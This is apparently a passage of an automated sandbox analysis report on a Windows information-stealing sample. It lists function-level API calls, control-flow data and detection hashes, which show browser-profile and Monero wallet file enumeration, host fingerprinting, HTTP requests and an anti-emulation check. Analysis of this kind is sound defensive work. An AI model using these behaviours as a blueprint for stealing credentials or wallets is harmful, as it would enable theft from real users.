                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 7f5aa58a38f6018ead2b77dfb87e7dcb9c7e333c425f00a39b1f20c8c9b07aa4
                              • Instruction ID: 19ead3118d36f59451b6ccdac92a300def1421eea6d0cd9b51d4a5901a0c54af
                              • Opcode Fuzzy Hash: 7f5aa58a38f6018ead2b77dfb87e7dcb9c7e333c425f00a39b1f20c8c9b07aa4
                              • Instruction Fuzzy Hash: FB0162B0D44308BADB10DFD1CC49B9EB778AF04706F248055EB05B61C0D7745689979D
                              Function 00C66AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 c66af3 1451 c66b0a 1450->1451 1453 c66b0c-c66b22 call c66920 call c65b10 CloseHandle ExitProcess 1451->1453 1454 c66aba-c66ad7 call c6aad0 OpenEventA 1451->1454 1460 c66af5-c66b04 CloseHandle Sleep 1454->1460 1461 c66ad9-c66af1 call c6aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007F9208,?,00C7110C,?,00000000,?,00C71110,?,00000000,00C70AEF), ref: 00C66ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C66AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00C66AF9
                              • Sleep.KERNEL32(00001770), ref: 00C66B04
                              • CloseHandle.KERNEL32(?,00000000,?,007F9208,?,00C7110C,?,00000000,?,00C71110,?,00000000,00C70AEF), ref: 00C66B1A
                              • ExitProcess.KERNEL32 ref: 00C66B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 9faca0caf1a953ed926159c9460f86a113a1a33220f64a5fc005baff334b6fe9
                              • Instruction ID: c4ad4496aed186ed592c9023720128aede04e2b5d10ca7e1a8e1b6d60aaa6cde
                              • Opcode Fuzzy Hash: 9faca0caf1a953ed926159c9460f86a113a1a33220f64a5fc005baff334b6fe9
                              • Instruction Fuzzy Hash: 8AF03A30940209EFE720ABE19C8ABBD7A74EF04701F144526F912B1182CBB05544FAA6
                              Function 00C547B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: f50d514723a0203dbef2bf0851e06db0a6bec514be4f7e65f3ae413e21099d32
                              • Instruction ID: 32df5436f12472a8dcc88074948088a826bedf6f7dc83f93b9f1250e7c79916f
                              • Opcode Fuzzy Hash: f50d514723a0203dbef2bf0851e06db0a6bec514be4f7e65f3ae413e21099d32
                              • Instruction Fuzzy Hash: C4212CB1D00209ABDF14DFA5E845ADE7B74EB44320F148626E915B72C1EB706A09DF92
                              Function 00C651F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C56280: InternetOpenA.WININET(00C70DFE,00000001,00000000,00000000,00000000), ref: 00C562E1
                                • Part of subcall function 00C56280: StrCmpCA.SHLWAPI(?,007FE758), ref: 00C56303
                                • Part of subcall function 00C56280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C56335
                                • Part of subcall function 00C56280: HttpOpenRequestA.WININET(00000000,GET,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C56385
                                • Part of subcall function 00C56280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C563BF
                                • Part of subcall function 00C56280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C563D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C65228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 30dcfa14b53e7ba8dd6d0111bd286d0c3f688aabc594d7b0def0335164c98efb
                              • Instruction ID: af4233f6a020103bda4188091691ce3a012e4accc76a634fa0038cc11de64bd0
                              • Opcode Fuzzy Hash: 30dcfa14b53e7ba8dd6d0111bd286d0c3f688aabc594d7b0def0335164c98efb
                              • Instruction Fuzzy Hash: FF110330910148ABCB24FFA5DDD6AED7778AF54300F904164FD1A67592EF306B09EE91
                              Function 00C51110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C5112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C51132
                              • ExitProcess.KERNEL32 ref: 00C51143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: f5a1559c3292882c855f88d05038f3f17158f248e5da06fc7730388342149c8d
                              • Instruction ID: 78e680e1eef0bae4e15933d56719a96371f755733482ee5474b339414f2abaeb
                              • Opcode Fuzzy Hash: f5a1559c3292882c855f88d05038f3f17158f248e5da06fc7730388342149c8d
                              • Instruction Fuzzy Hash: B7E0E674955308FFE7246BA19C0EB0D76B8EF04B02F144057FB09761D0D6B5264496D9
                              Function 00C510A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C510B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C510F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 5a1c786e680ebfad8d00ce229c50f24d3cd881907fa0e69cca021349977ee8e6
                              • Instruction ID: 2803fe16bf4c4452e81b7e19969841c721c2921359e5931e35969c485f00e555
                              • Opcode Fuzzy Hash: 5a1c786e680ebfad8d00ce229c50f24d3cd881907fa0e69cca021349977ee8e6
                              • Instruction Fuzzy Hash: 31F0E275641208BBEB149AA4AC4EFBAB7E8E705B15F300459F904E3280D5719F48DAA5
                              Function 00C51190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67910
                                • Part of subcall function 00C678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C67917
                                • Part of subcall function 00C678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C6792F
                                • Part of subcall function 00C67850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C511B7), ref: 00C67880
                                • Part of subcall function 00C67850: RtlAllocateHeap.NTDLL(00000000), ref: 00C67887
                                • Part of subcall function 00C67850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C6789F
                              • ExitProcess.KERNEL32 ref: 00C511C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 9878b88af33569ab9ec1dcb5de2d1fe2764d99f1f06fb3df981c351a4c29fa5b
                              • Instruction ID: e3bdb71ce2550aeaf4d0822620c56399accf648662be20dfb32a4dbd912d8b39
                              • Opcode Fuzzy Hash: 9878b88af33569ab9ec1dcb5de2d1fe2764d99f1f06fb3df981c351a4c29fa5b
                              • Instruction Fuzzy Hash: 96E0E66591420157DA1073F16C4AB2A329C5B1434EF080926BF05F2143F915E94895A9

                              Non-executed Functions

                              Function 00C638B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00C638CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C638E3
                              • lstrcat.KERNEL32(?,?), ref: 00C63935
                              • StrCmpCA.SHLWAPI(?,00C70F70), ref: 00C63947
                              • StrCmpCA.SHLWAPI(?,00C70F74), ref: 00C6395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C63C67
                              • FindClose.KERNEL32(000000FF), ref: 00C63C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 0236f499e2bdcacdf6f9eb135c04d529a944b29ca207d4f20581d59471bcec6d
                              • Instruction ID: c3ce42a2bd536847afd98d73d0fbd4d599c7dbfbe8ccb532c48c7d3a74192800
                              • Opcode Fuzzy Hash: 0236f499e2bdcacdf6f9eb135c04d529a944b29ca207d4f20581d59471bcec6d
                              • Instruction Fuzzy Hash: B5A132B1A00218AFDB34DFA5DC85FEA7378BF44300F084599B51DA6141EB759B88CFA2
                              Function 00C5BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00C70B32,00C70B2B,00000000,?,?,?,00C713F4,00C70B2A), ref: 00C5BEF5
                              • StrCmpCA.SHLWAPI(?,00C713F8), ref: 00C5BF4D
                              • StrCmpCA.SHLWAPI(?,00C713FC), ref: 00C5BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5C7BF
                              • FindClose.KERNEL32(000000FF), ref: 00C5C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 2108f2b10fed69ace702bfcf8672f1d1f3baa603d85f13f4ac4cf809209c18c6
                              • Instruction ID: 1aebe3902549d28d31c85eed2d12595f8cb592129cc82eb5359a7ba45465ead0
                              • Opcode Fuzzy Hash: 2108f2b10fed69ace702bfcf8672f1d1f3baa603d85f13f4ac4cf809209c18c6
                              • Instruction Fuzzy Hash: F24242729101049BCB24FBA0DDD6EEE737DAF98300F404569B90AB7081EE349B49DF92
                              Function 00C64910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00C6492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C64943
                              • StrCmpCA.SHLWAPI(?,00C70FDC), ref: 00C64971
                              • StrCmpCA.SHLWAPI(?,00C70FE0), ref: 00C64987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C64B7D
                              • FindClose.KERNEL32(000000FF), ref: 00C64B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 445aadb8be776a16c710ec4778f078379c1a50126f39af392486d01a0c112d51
                              • Instruction ID: d41091344da460deeafb61a514fdc30ddb2cf449d9b083b804e3ba4c627c5a12
                              • Opcode Fuzzy Hash: 445aadb8be776a16c710ec4778f078379c1a50126f39af392486d01a0c112d51
                              • Instruction Fuzzy Hash: 9A6114B1510218AFCB34EBA1DC89EEA737CBF48701F048599F509A6141EB75AB89CF91
                              Function 00C64570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C64580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C64587
                              • wsprintfA.USER32 ref: 00C645A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C645BD
                              • StrCmpCA.SHLWAPI(?,00C70FC4), ref: 00C645EB
                              • StrCmpCA.SHLWAPI(?,00C70FC8), ref: 00C64601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C6468B
                              • FindClose.KERNEL32(000000FF), ref: 00C646A0
                              • lstrcat.KERNEL32(?,007FE748), ref: 00C646C5
                              • lstrcat.KERNEL32(?,007FDC20), ref: 00C646D8
                              • lstrlen.KERNEL32(?), ref: 00C646E5
                              • lstrlen.KERNEL32(?), ref: 00C646F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
